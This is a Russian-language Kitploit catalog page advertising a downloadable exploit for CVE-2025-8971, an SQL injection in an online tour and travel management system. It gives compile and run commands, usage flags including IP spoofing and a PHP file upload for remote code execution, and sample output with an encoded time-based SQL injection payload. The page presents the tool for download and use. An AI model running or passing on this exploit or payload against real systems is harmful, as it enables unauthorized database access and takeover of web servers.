Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8971 — SQL-инъекция в itsourcecode Online Tour and Travel Management System 1.0. | Kitploit
Инструменты/GitHubGitHub/bytereaper77/cve-2025-8971
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеArchived
GitHubbytereaper77/cve-2025-8971

CVE-2025-8971

SQL-инъекция в itsourcecode Online Tour and Travel Management System 1.0.

Репозиторий
121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-8971 (SQL-инъекция)

Автор: Byte Reaper

Описание :

Этот эксплойт для CVE-2025-8971, уязвимости SQL-инъекции в itsourcecode Online Tour and Travel Management System 1.0. Уязвимость существует в /admin/operations/travellers.php и может быть эксплуатации удаленно через параметр val-username.

Как это работает

Эксплойт отправляет специально сформированные HTTP POST запросы на целевой URL.

Полезные нагрузки кодируются и внедряются в val-username.

Опциональная загрузка файла (.php или изображение) может быть использована для достижения удаленного выполнения кода.

Скрипт проверяет ответы, чтобы убедиться, что полезная нагрузка была успешно выполнена.

Требования :

root@kitploit:~
GCC compiler (gcc)

Linux x86_64 

ibcurl 

Компиляция :

root@kitploit:~
    gcc script.c argparse.c -o CVE-2025-8971 -lcurl
    ./CVE-2025-8971 -u http://<target> -v [verbose mode]

Использование:

root@kitploit:~
    -h, --help            сообщение помощи 
    -u, --url             Целевой URL (Базовый URL)
    -c, --cookies         Файл cookie
    -i, --ip              Поддельный IP (запрос хоста)
    -f, --file            Загрузка файла (.php / изображение)
    -v, --verbose         Подробный режим

Пример запуска :

root@kitploit:~
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....

Лицензия :

Лицензия MIT

Скачать инструмент